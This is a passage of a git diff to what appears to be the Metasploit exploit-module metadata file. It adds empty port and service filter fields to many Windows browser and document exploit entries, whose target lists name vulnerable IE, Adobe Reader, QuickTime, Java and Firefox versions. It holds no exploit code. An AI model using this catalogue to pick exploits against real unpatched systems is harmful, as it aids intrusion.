"autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61794,6 +82273,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61832,6 +82317,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61869,6 +82360,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61907,6 +82404,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -61948,6 +82451,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61985,6 +82494,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Windows Universal (JS Heap Spray)" ], @@ -62021,6 +82536,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Universal (JS Heap Spray)" ], @@ -62058,6 +82579,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader v9.0.0 (Windows XP SP3 English)", "Adobe Reader v8.1.2 (Windows XP SP2 English)" @@ -62097,6 +82624,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Windows English (JS Heap Spray)", "Adobe Reader Windows German (JS Heap Spray)" @@ -62131,6 +82664,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -62169,6 +82708,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP / IE / Adobe Reader 10/11" ], @@ -62202,6 +82747,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader v8.1.2 (Windows XP SP3 English)" ], @@ -62236,6 +82787,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -62271,6 +82828,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows NT/2000/XP/2003 Automatic" ], @@ -62307,6 +82870,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP with IE 6", @@ -62345,6 +82914,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Amaya Browser v11" ], @@ -62379,6 +82954,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0" ], @@ -62413,6 +82994,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -62446,6 +83033,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English SP4", "Windows XP Pro English SP2" @@ -62481,6 +83074,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP3" ], @@ -62517,6 +83116,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2", @@ -62557,6 +83162,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Quicktime 7.7.3 with IE 8 on Windows XP SP3", "Quicktime 7.7.2 with IE 8 on Windows XP SP3", @@ -62594,6 +83205,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Apple QuickTime Player 7.1.3", @@ -62632,6 +83249,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Apple QuickTime Player 7.6.6" ], @@ -62667,6 +83290,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -62702,6 +83331,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0/SP1 Pro English", "Windows 2000 Pro English ALL" @@ -62737,6 +83372,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -62770,6 +83411,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -62805,6 +83452,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0" ], @@ -62838,6 +83491,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "epi.dll v10.0.4.18 on Windows XP SP3" ], @@ -62874,6 +83533,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" ], @@ -62906,6 +83571,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -62940,6 +83611,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -62975,6 +83652,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0 English" ], @@ -63011,6 +83694,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63045,6 +83734,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63077,6 +83772,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2-SP3 IE 6.0/7.0" ], @@ -63112,6 +83813,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63146,6 +83853,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63180,6 +83893,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -63218,6 +83937,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -63256,6 +83981,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Cisco WebEx Extension 1.0.1" ], @@ -63291,6 +84022,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -63331,6 +84068,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 / IE7 (No DEP)" @@ -63365,6 +84108,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Universal" ], @@ -63397,6 +84146,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -63433,6 +84188,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -63471,6 +84232,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -63509,6 +84276,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63541,6 +84314,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -63574,6 +84353,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -63607,6 +84392,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63640,6 +84431,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Pro SP0/SP1 English", "Windows 2000 Pro English All" @@ -63675,6 +84472,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "PSH (Binary)" ], @@ -63709,6 +84512,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IE 6 SP0-SP2 / Windows XP SP2 Pro English" ], @@ -63743,6 +84552,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mozilla Firefox 38 to 41" ], @@ -63779,6 +84594,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281" @@ -63814,6 +84635,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -63847,6 +84674,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2 Pro English" ], @@ -63881,6 +84714,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0" ], @@ -63916,6 +84755,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63951,6 +84796,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -63985,6 +84836,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 7 on Windows XP SP3", @@ -64026,6 +84883,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -64061,6 +84924,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -64095,6 +84964,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "XUpload.ocx 3.0.0.3 on Windows XP SP3 / IE6 SP3" ], @@ -64128,6 +85003,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2 Pro English / IE6SP0-SP2" ], @@ -64164,6 +85045,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 7 on Windows XP SP3", @@ -64206,6 +85093,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic IE on Windows XP" ], @@ -64240,6 +85133,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0" ], @@ -64276,6 +85175,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" ], @@ -64312,6 +85217,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -64352,6 +85263,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -64388,6 +85305,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -64422,6 +85345,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English" ], @@ -64467,6 +85396,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3", @@ -64510,6 +85445,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3", @@ -64550,6 +85491,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "MS06-014 - RDS.DataSpace", @@ -64602,6 +85549,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 7 on Windows XP SP3", @@ -64641,6 +85594,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0 with Internet Explorer 6.0" ], @@ -64679,6 +85638,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 7 with Office 2007|2010", @@ -64715,6 +85680,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86/x64" ], @@ -64752,6 +85723,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Internet Explorer 6/7", @@ -64792,6 +85769,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -64835,6 +85818,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -64877,6 +85866,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP/Vista SP0-SP3 (IE6/IE7)", @@ -64914,6 +85909,12 @@ "platform": "Java,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Generic (Java Payload)" @@ -64952,6 +85953,12 @@ "platform": "Java,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)" @@ -64989,6 +85996,12 @@ "platform": "Java", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)" ], @@ -65027,6 +86040,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal (msvcr71.dll ROP)" ], @@ -65063,6 +86082,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows / Java 6 <=u18" ], @@ -65099,6 +86124,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Java Runtime on Windows x86" @@ -65135,6 +86166,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Java Runtime 1.6.31 to 1.6.35 and 1.7.03 to 1.7.07 on Windows x86" @@ -65171,6 +86208,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Java Runtime on Windows x86" @@ -65206,6 +86249,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Pro SP3 English", "Debugging" @@ -65240,6 +86289,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / IE 6.0SP1 English" ], @@ -65276,6 +86331,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -65309,6 +86370,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Pro SP2 English" ], @@ -65343,6 +86410,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -65375,6 +86448,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0/SP1 Pro English", "Windows 2000 Pro English All" @@ -65409,6 +86488,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -65444,6 +86529,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -65479,6 +86570,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Maxthon 3 (prior to 3.3) on Windows" ], @@ -65512,6 +86609,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0/SP1" ], @@ -65547,6 +86650,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -65580,6 +86689,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Pro SP2 English" ], @@ -65613,6 +86728,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English All", "Windows XP Pro SP0/SP1 English" @@ -65650,6 +86771,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP - Firefox 8 / 8.0.1", @@ -65695,6 +86822,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox 17 & Firefox 21 / Windows XP SP3" ], @@ -65732,6 +86865,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox 17 / Windows XP SP3" ], @@ -65769,6 +86908,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox 3.6.8 - 3.6.11, Windows XP/Windows Server 2003" ], @@ -65805,6 +86950,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Firefox 3.6.16 on Windows XP SP3", @@ -65843,6 +86994,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP - Firefox 7", @@ -65882,6 +87039,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto (Direct attack against Windows XP, otherwise through Java, if enabled)", "Firefox Runtime, fails with ASLR", @@ -65926,6 +87089,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Mozilla Firefox 3.6.16 (no JAVA)", @@ -65962,6 +87131,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows NT/XP/2003 Automatic" ], @@ -65999,6 +87174,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Internet Explorer 6 on Windows XP", "Internet Explorer 6 Windows 2000" @@ -66038,6 +87219,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP/2003/Vista Automatic" ], @@ -66080,6 +87267,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)", "Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)" @@ -66119,6 +87312,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows NT 4.0 -> Windows 2003 SP1" ], @@ -66153,6 +87352,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / IE 6.0SP1 English" ], @@ -66188,6 +87393,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000/XP/2003 Universal" ], @@ -66222,6 +87433,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 -> Windows 2003 SP0" ], @@ -66259,6 +87476,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista", "IE6 on Windows NT, 2000, XP, 2003 (all languages)", @@ -66298,6 +87521,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -66332,6 +87561,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2-SP3 IE 6.0 SP0-SP2" ], @@ -66367,6 +87602,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 IE 6.0 SP0-SP2" ], @@ -66403,6 +87644,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -66436,6 +87683,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2-SP3 / Windows Vista SP0 / IE 7" ], @@ -66471,6 +87724,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 - IE6 - Office XP SP0", "Windows XP SP3 - IE6 - Office XP SP3" @@ -66511,6 +87770,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" ], @@ -66548,6 +87813,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -66584,6 +87855,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -66621,6 +87898,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3", @@ -66663,6 +87946,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista", "IE 6 SP0-SP2 (onclick)", @@ -66701,6 +87990,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic (Heap Spray)" ], @@ -66738,6 +88033,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Internet Explorer on Windows" @@ -66778,6 +88079,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 Automatic" ], @@ -66813,6 +88120,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -66849,6 +88162,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -66888,6 +88207,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Debug", @@ -66930,6 +88255,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Internet Explorer 8", @@ -66937,7 +88268,7 @@ "Internet Explorer 6", "Debug Target (Crash)" ], - "mod_time": "2018-09-15 18:54:45 +0000", + "mod_time": "2018-10-02 15:57:57 +0000", "path": "/modules/exploits/windows/browser/ms11_003_ie_css_import.rb", "is_install_path": true, "ref_name": "windows/browser/ms11_003_ie_css_import", @@ -66970,6 +88301,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Internet Explorer 7 on XP SP3", @@ -67012,6 +88349,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3", @@ -67052,6 +88395,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3 / Visio Viewer 2010", @@ -67090,6 +88439,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -67131,6 +88486,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + 